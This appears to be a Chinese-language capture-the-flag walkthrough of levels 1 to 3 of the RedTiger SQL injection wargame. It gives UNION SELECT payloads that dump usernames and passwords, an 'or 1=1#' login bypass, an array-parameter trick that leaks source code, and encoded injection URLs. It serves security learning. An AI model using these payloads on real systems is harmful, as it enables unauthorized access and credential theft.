题目传送门

level 1

http://redtiger.labs.overthewire.org/level1.php

上来寻找注入点,看到Category:后面的“1”是个跳转,点了一下就得到"cat=1"

于是就开始尝试。。结果发现。。只是数字型注入,不用闭合‘ “ ) ……,所以直接按照提示构造payload就ok了!

  1. order by
  2. 查flag
http://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users

level 2

http://redtiger.labs.overthewire.org/level2.php

这也是一个比较简单的题了。

提示也给了“A simple loginbypass”

一来就用万能密码呗!

万能用户名不行,那就试试万能密码呗。然后就拿到flag了

username=admin&password=1'or 1=1#&login=Login

level 3

Hint: Try to get an error. Tablename: level3_users

估计就是报错注入呗~

但是好像思路不对。。。然后试了半天,没试出来,就去看看大佬的wp,才知道,是要报错。。但是这个报错点也太。。。。。又学了一波新知识~

报错:将usr变为一个数组,然后进行提交。

错误顺利抛出:

Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25

然后得到关于.inc的一些资料:

.inc 文件,顾名思义就是include file,实际上文件的后缀对于文件包含是无所谓,你可以包含一个asp文件,也可以包含txt文。一般我们使用inc作为后缀,是因为这样能体现该文件的作用。

然后就去把源码down下来

<?php

    // warning! ugly code ahead :)
    // 加密函数 
    function encrypt($str)
    {
        $cryptedstr = "";
        srand(3284724);
        for ($i =0; $i < strlen($str); $i++)
        {
            $temp = ord(substr($str,$i,1)) ^ rand(0, 255);

            while(strlen($temp)<3)
            {
                $temp = "0".$temp;
            }
            $cryptedstr .= $temp. "";
        }
        return base64_encode($cryptedstr);
    }
    # 解密函数
    function decrypt ($str)
    {
        srand(3284724);
        if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
        {
            $str = base64_decode($str);
            if ($str != "" && $str != null && $str != false)
            {
                $decStr = "";

                for ($i=0; $i < strlen($str); $i+=3)
                {
                    $array[$i/3] = substr($str,$i,3);
                }

                foreach($array as $s)
                {
                    $a = $s ^ rand(0, 255);
                    $decStr .= chr($a);
                }

                return $decStr;
            }
            return false;
        }
        return false;
    }
?>

告诉了加解密的算法,那样不就简单了嘛,跟第一题的思路一样,就可以拿到用户名和密码了。

但是后来加密了之后发现死活查询不出来。。然后又查了一波资料。。。得知win和linux下加密出来的字符串是不一样的。因为windows和linux对于相同的srand()种子下rand()得出的随机数不一样,导致加密函数只在linux下有效。最后改在docker里面运行加密函数,继续下面的过程

# order by
original:
https://redtiger.labs.overthewire.org/level3.php?usr=Admin' order by 6
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMzMDY4MTc1MDg5 

original:
https://redtiger.labs.overthewire.org/level3.php?usr=Admin' order by 7
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDY4MTc1MDg5
# order by 会报错,不晓得为啥,但是union就查询正常~~

# union 查回显
original:
https://redtiger.labs.overthewire.org/level3.php
?usr=' union select 1,2,3,4,5,6,7'
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDc2MTk0MDEzMTgyMTQxMjMxMjIzMDc1MTk5MTA5MTg0MTU5MDkzMjM5MDc4MDczMjM3MDc3MTc0MDcwMDU3MTk5MjM0MjE5MDgyMjQ2MTUzMjE5
# 查用户名和密码
original:
https://redtiger.labs.overthewire.org/level3.php?usr=' union select 1,username,3,4,5,password,7 from level3_users where username='Admin
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDIwMjM4MDE1MTI3MTMzMTkwMTU0MDAxMjQ2MTU3MjA4MTc3MDk2MTI4MjIwMTE2MTIxMTYzMTQ5MjEzMTYwMTA4MDMyMjUyMjAzMDk3MTU2MTkwMTc1MDEzMTM5MDc4MTU1MDk2MDg1MTM0MTk3MTE5MDU5MTYzMTc4MDU2MDM3MDAzMTM2MDQ3MDY2MTA2MTE0MDQ2MjA2MTQ4MDcyMTQxMjE0MDc1MDQ0MjE1MjAzMDM3MDgyMTk4MDcyMTIzMjE1